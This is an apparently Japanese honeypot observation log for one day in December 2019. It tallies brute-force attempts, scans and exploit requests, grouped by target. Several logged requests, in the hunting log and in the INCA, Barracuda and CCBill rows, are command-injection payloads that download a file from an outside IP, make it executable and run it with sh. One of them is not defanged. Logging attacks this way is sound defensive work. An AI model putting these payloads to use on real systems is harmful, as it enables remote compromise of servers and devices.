WOWHoneypot観察(271日目)
2019/12/12(木)
トータルは8401件でした。
ハンティングログは以下です。
208.97.139[.]113 wget hxxp[:]//145.249.106[.]241/richard; curl -O hxxp[:]//145.249.106[.]241/richard |
208.97.139[.]113 curl -O hxxp[:]//145.249.106[.]241/richard |
208.97.139[.]112 wget hxxp[:]//145.249.106[.]241/richard; curl -O hxxp[:]//145.249.106[.]241/richard |
208.97.139[.]112 curl -O hxxp[:]//145.249.106[.]241/richard |
208.97.139[.]102 wget hxxp[:]//145.249.106[.]241/richard; curl -O hxxp[:]//145.249.106[.]241/richard |
208.97.139[.]102 curl -O hxxp[:]//145.249.106[.]241/richard |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト | |
---|---|---|---|
8096 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html | |
118 | WordPressに対するブルートフォース攻撃 | GET /wp-login.php | |
117 | WordPressに対するブルートフォース攻撃 | POST /wp-login.php | |
44 | アクセス | GET / | |
2 | phpMyAdminの調査 | GET /admin-scripts.asp | |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList | |
1 | 調査 | HEAD / | |
1 | 調査 | GET HTTP/1.1" | |
1 | ZmEuによるphpMyAdminのスキャン | GET /w00tw00t.at.blackhats.romanian.anti-sec:) | |
1 | ZmEuによるphpMyAdminのスキャン | GET /pma/scripts/setup.php | |
1 | ZmEuによるphpMyAdminのスキャン | GET /phpmyadmin/scripts/setup.php | |
1 | ZmEuによるphpMyAdminのスキャン | GET /phpMyAdmin/scripts/setup.php | |
1 | ZmEuによるphpMyAdminのスキャン | GET /myadmin/scripts/setup.php | |
1 | クローリング | GET /robots.txt | |
1 | NMAPによるスキャン | POST /sdk | |
1 | NMAPによるスキャン | GET /nmaplowercheck1576139390 | |
1 | NMAPによるスキャン | GET /NmapUpperCheck1576139390 | |
1 | NMAPによるスキャン | GET /Nmap/folder/check1576139390 | |
1 | NMAPによるスキャン | GET /HNAP1 | |
1 | NMAPによるスキャン | GET /evox/about | |
1 | テストファイル調査 | GET /is_test | |
1 | 不明 | GET /dd/ | |
1 | INCA IM-204の脆弱性を狙った通信 | GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard | |
1 | Barracuda製品の脆弱性を狙った通信 | GET /cgi-bin/img.pl?f=etc/hosts&f=%Q!bin/sh%20-c%20echo%20'YYY';wget%20hxxp[:]//145.249.106.241/richard;%20curl%20-O%20hxxp[:]//145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard;%20echo%20'YYY' | ! |
1 | CCBill whereami.cgiの脆弱性を狙った通信 | GET /cgi-bin/ccbill/whereami.cgi?g=wget%20hxxp[:]//145.249.106.241/richard;%20curl%20-O%20hxxp[:]//145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard | |
1 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php | |
1 | Strutsの調査 | GET /LoginPage.do | |
1 | WordPressの調査 | GET ///wp-json/wp/v2/users/ | |
1 | WordPressの調査 | GET ///?author=1 |